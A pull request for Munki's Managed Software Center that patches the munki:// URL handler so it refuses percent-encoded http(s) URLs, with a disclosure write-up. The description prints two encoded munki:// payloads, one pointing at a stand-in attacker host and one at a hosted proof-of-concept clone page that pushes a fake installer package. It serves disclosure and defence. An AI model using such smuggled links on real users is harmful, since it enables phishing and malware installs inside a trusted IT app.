### PR TITLE
`munki://` handler navigates main webview to arbitrary remote URLs

### DIFF
--- a/code/apps/Managed Software Center/Managed Software Center/Controllers/MainWindowController.swift
+++ b/code/apps/Managed Software Center/Managed Software Center/Controllers/MainWindowController.swift
@@ -1242,6 +1242,16 @@ class MainWindowController: NSWindowController {
             return
         }
         var filename = unquote(host)
+        // Reject payloads that smuggle a remote URL through the munki:// scheme.
+        // handleMunkiURL is for internal page names only; load_page accepts
+        // http/https specifically for admin-configured CustomSidebarItems,
+        // which never flow through this function.
+        if let components = URLComponents(string: filename),
+           ["https", "http"].contains(components.scheme)
+        {
+            msc_debug_log("Refusing munki:// URL with embedded http(s) scheme: \(filename)")
+            return
+        }
         if filename == "appleupdates" {
             openSoftwareUpdatePrefsPane()
             return


### PR DESCRIPTION
## Background

One of our security engineers raised a concern with me about a possible attack vector via MSC. I poked around and whipped up a POC and potential fix.

## Attack

A percent-encoded `http(s)://` URL embedded in a `munki://` link is loaded directly in MSC's main webview:

```
munki://%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%65%78%61%6d%70%6c%65%2f%61%6e%64%72%6f%69%64%73%74%75%64%69%6f%2e%68%74%6d%6c
```

The example above decodes to: `http://attacker.example/androidstudio.html`. Any clickable-link surface (email, chat, a webpage) becomes a delivery channel to a Mac with MSC installed.

## Risk

Attacker-controlled HTML rendered inside MSC's window inherits the trust users place in MSC as the IT-sanctioned app store. The bundled stylesheets are reusable verbatim, so a cloned catalog entry is visually indistinguishable from a real one.

One potential attack vector:

A fake "Install" button drops an attacker `.pkg` into `~/Downloads` and tells the user to run it. This isn't Munki's real install flow, but a less-technical user who trusts MSC might be less inclined to question it — they see the familiar UI, click Install, and follow the on-screen instructions.

## POC

A pixel-identical clone of an MSC detail page that downloads a fake `.pkg` and prompts the user to run it.

```
open munki://%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6b%65%76%69%6e%6d%63%6f%78%2e%63%6f%6d%2f%74%65%6d%70%2f%6d%75%6e%6b%69%70%6f%63%2f%69%6e%64%65%78%2e%68%74%6d%6c
```

Decodes to: https://www.kevinmcox.com/temp/munkipoc/index.html

## Fix

Reject http and https URLs at the entry of `handleMunkiURL` so percent-encoded remote URLs can't be smuggled into the webview through the `munki://` scheme handler. Admin-configured `CustomSidebarItems` that use http(s) URLs are unaffected — they reach `load_page` directly without going through `handleMunkiURL`.
